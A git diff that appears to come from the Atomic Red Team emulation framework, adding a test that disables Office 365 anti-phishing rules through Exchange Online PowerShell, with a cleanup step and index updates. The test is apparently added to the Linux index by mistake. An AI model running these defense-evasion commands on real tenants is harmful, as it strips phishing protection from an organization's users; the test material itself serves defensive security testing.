diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-office-365.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-office-365.json
index c35e563a..f9a8214d 100644
--- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-office-365.json
+++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-office-365.json
@@ -1 +1 @@
-{"version":"4.2","name":"Atomic Red Team (Office-365)","description":"Atomic Red Team (Office-365) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[]}
\ No newline at end of file
+{"version":"4.2","name":"Atomic Red Team (Office-365)","description":"Atomic Red Team (Office-365) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1562.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]}
\ No newline at end of file
diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv
index f12bbbeb..44028ad9 100644
--- a/atomics/Indexes/Indexes-CSV/index.csv
+++ b/atomics/Indexes/Indexes-CSV/index.csv
@@ -343,6 +343,7 @@ defense-evasion,T1562.001,Disable or Modify Tools,21,Uninstall Crowdstrike Falco
defense-evasion,T1562.001,Disable or Modify Tools,22,Tamper with Windows Defender Evade Scanning -Folder,0b19f4ee-de90-4059-88cb-63c800c683ed,powershell
defense-evasion,T1562.001,Disable or Modify Tools,23,Tamper with Windows Defender Evade Scanning -Extension,315f4be6-2240-4552-b3e1-d1047f5eecea,powershell
defense-evasion,T1562.001,Disable or Modify Tools,24,Tamper with Windows Defender Evade Scanning -Process,a123ce6a-3916-45d6-ba9c-7d4081315c27,powershell
+defense-evasion,T1562.001,Disable or Modify Tools,25,office-365-Disable-AntiPhishRule,b9bbae2c-2ba6-4cf3-b452-8e8f908696f3,powershell
defense-evasion,T1574.006,Dynamic Linker Hijacking,1,Shared Library Injection via /etc/ld.so.preload,39cb0e67-dd0d-4b74-a74b-c072db7ae991,bash
defense-evasion,T1574.006,Dynamic Linker Hijacking,2,Shared Library Injection via LD_PRELOAD,bc219ff7-789f-4d51-9142-ecae3397deae,bash
defense-evasion,T1055.001,Dynamic-link Library Injection,1,Process Injection via mavinject.exe,74496461-11a1-4982-b439-4d87a550d254,powershell
diff --git a/atomics/Indexes/Indexes-CSV/linux-index.csv b/atomics/Indexes/Indexes-CSV/linux-index.csv
index bd4769f1..a9f57a20 100644
--- a/atomics/Indexes/Indexes-CSV/linux-index.csv
+++ b/atomics/Indexes/Indexes-CSV/linux-index.csv
@@ -97,6 +97,7 @@ defense-evasion,T1562.001,Disable or Modify Tools,1,Disable syslog,4ce786f8-e601
defense-evasion,T1562.001,Disable or Modify Tools,2,Disable Cb Response,ae8943f7-0f8d-44de-962d-fbc2e2f03eb8,sh
defense-evasion,T1562.001,Disable or Modify Tools,3,Disable SELinux,fc225f36-9279-4c39-b3f9-5141ab74f8d8,sh
defense-evasion,T1562.001,Disable or Modify Tools,4,Stop Crowdstrike Falcon on Linux,828a1278-81cc-4802-96ab-188bf29ca77d,sh
+defense-evasion,T1562.001,Disable or Modify Tools,25,office-365-Disable-AntiPhishRule,b9bbae2c-2ba6-4cf3-b452-8e8f908696f3,powershell
defense-evasion,T1574.006,Dynamic Linker Hijacking,1,Shared Library Injection via /etc/ld.so.preload,39cb0e67-dd0d-4b74-a74b-c072db7ae991,bash
defense-evasion,T1574.006,Dynamic Linker Hijacking,2,Shared Library Injection via LD_PRELOAD,bc219ff7-789f-4d51-9142-ecae3397deae,bash
defense-evasion,T1070.004,File Deletion,1,Delete a single file - Linux/macOS,562d737f-2fc6-4b09-8c2a-7f8ff0828480,sh
diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md
index 08c541da..0ab7a8b7 100644
--- a/atomics/Indexes/Indexes-Markdown/index.md
+++ b/atomics/Indexes/Indexes-Markdown/index.md
@@ -573,6 +573,7 @@
- Atomic Test #22: Tamper with Windows Defender Evade Scanning -Folder [windows]
- Atomic Test #23: Tamper with Windows Defender Evade Scanning -Extension [windows]
- Atomic Test #24: Tamper with Windows Defender Evade Scanning -Process [windows]
+ - Atomic Test #25: office-365-Disable-AntiPhishRule [office-365]
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1484 Domain Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
diff --git a/atomics/Indexes/Indexes-Markdown/linux-index.md b/atomics/Indexes/Indexes-Markdown/linux-index.md
index f364dbbc..49bcc017 100644
--- a/atomics/Indexes/Indexes-Markdown/linux-index.md
+++ b/atomics/Indexes/Indexes-Markdown/linux-index.md
@@ -220,6 +220,7 @@
- Atomic Test #2: Disable Cb Response [linux]
- Atomic Test #3: Disable SELinux [linux]
- Atomic Test #4: Stop Crowdstrike Falcon on Linux [linux]
+ - Atomic Test #25: office-365-Disable-AntiPhishRule [office-365]
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1484 Domain Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1484.002 Domain Trust Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index cb20e020..37676f1b 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -24532,6 +24532,52 @@ defense-evasion:
Remove-MpPreference -ExclusionProcess $excludedProcess
name: powershell
elevation_required: true
+ - name: office-365-Disable-AntiPhishRule
+ auto_generated_guid: b9bbae2c-2ba6-4cf3-b452-8e8f908696f3
+ description: 'Using the Disable-AntiPhishRule cmdlet to disable antiphish rules
+ in your office-365 organization.
+
+'
+ supported_platforms:
+ - office-365
+ input_arguments:
+ username:
+ description: office-365 username
+ type: String
+ default:
+ password:
+ description: office-365 password
+ type: String
+ default:
+ dependency_executor_name: powershell
+ dependencies:
+ - description: 'ExchangeOnlineManagement PowerShell module must be installed
+
+'
+ prereq_command: |
+ $RequiredModule = Get-Module -Name ExchangeOnlineManagement -ListAvailable
+ if (-not $RequiredModule) {exit 1}
+ if (-not $RequiredModule.ExportedCommands['Connect-ExchangeOnline']) {exit 1} else {exit 0}
+ get_prereq_command: |
+ Install-Module -Name ExchangeOnlineManagement
+ Import-Module ExchangeOnlineManagement
+ executor:
+ command: |
+ $secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
+ $creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
+ Connect-ExchangeOnline -Credential $creds
+ $test = Get-AntiPhishRule
+ Disable-AntiPhishRule -Identity $test.Name -Confirm:$false
+ Get-AntiPhishRule
+ cleanup_command: |
+ $secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
+ $creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
+ Connect-ExchangeOnline -Credential $creds
+ $test = Get-AntiPhishRule
+ Enable-AntiPhishRule -Identity $test.Name -Confirm:$false
+ Get-AntiPhishRule
+ name: powershell
+ elevation_required: false
T1078.002:
technique:
external_references:
diff --git a/atomics/T1562.001/T1562.001.md b/atomics/T1562.001/T1562.001.md
index ba2e2af9..7164b66b 100644
--- a/atomics/T1562.001/T1562.001.md
+++ b/atomics/T1562.001/T1562.001.md
@@ -52,6 +52,8 @@
- [Atomic Test #24 - Tamper with Windows Defender Evade Scanning -Process](#atomic-test-24---tamper-with-windows-defender-evade-scanning--process)
+- [Atomic Test #25 - office-365-Disable-AntiPhishRule](#atomic-test-25---office-365-disable-antiphishrule)
+
@@ -996,4 +998,67 @@ Remove-MpPreference -ExclusionProcess $excludedProcess
+
+
+
+## Atomic Test #25 - office-365-Disable-AntiPhishRule
+Using the Disable-AntiPhishRule cmdlet to disable antiphish rules in your office-365 organization.
+
+**Supported Platforms:** Office-365
+
+
+**auto_generated_guid:** b9bbae2c-2ba6-4cf3-b452-8e8f908696f3
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| username | office-365 username | String | |
+| password | office-365 password | String | |
+
+
+#### Attack Commands: Run with `powershell`!
+
+
+```powershell
+$secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
+$creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
+Connect-ExchangeOnline -Credential $creds
+$test = Get-AntiPhishRule
+Disable-AntiPhishRule -Identity $test.Name -Confirm:$false
+Get-AntiPhishRule
+```
+
+#### Cleanup Commands:
+```powershell
+$secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
+$creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
+Connect-ExchangeOnline -Credential $creds
+$test = Get-AntiPhishRule
+Enable-AntiPhishRule -Identity $test.Name -Confirm:$false
+Get-AntiPhishRule
+```
+
+
+
+#### Dependencies: Run with `powershell`!
+##### Description: ExchangeOnlineManagement PowerShell module must be installed
+##### Check Prereq Commands:
+```powershell
+$RequiredModule = Get-Module -Name ExchangeOnlineManagement -ListAvailable
+if (-not $RequiredModule) {exit 1}
+if (-not $RequiredModule.ExportedCommands['Connect-ExchangeOnline']) {exit 1} else {exit 0}
+```
+##### Get Prereq Commands:
+```powershell
+Install-Module -Name ExchangeOnlineManagement
+Import-Module ExchangeOnlineManagement
+```
+
+
+
+